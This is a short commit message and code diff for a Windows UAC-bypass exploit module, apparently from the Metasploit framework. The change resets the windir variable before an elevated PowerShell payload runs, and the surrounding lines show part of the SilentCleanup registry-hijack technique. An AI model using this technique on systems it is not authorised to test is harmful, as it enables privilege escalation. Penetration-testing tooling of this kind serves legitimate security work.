bypassuac_silentcleanup: cleanup %WINDIR% env var before calling powe…

…rshell payload

Fixes #12665

modules/exploits/windows/local/bypassuac_silentcleanup.rb

@@ -50,6 +50,7 @@ def initialize(info = {})
   def get_bypass_script(cmd)
     scr = %Q{
       if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
+        $env:windir = [System.Environment]::GetEnvironmentVariable("windir", "machine")
         #{cmd}
       } else {
           $registryPath = "HKCU:\\Environment"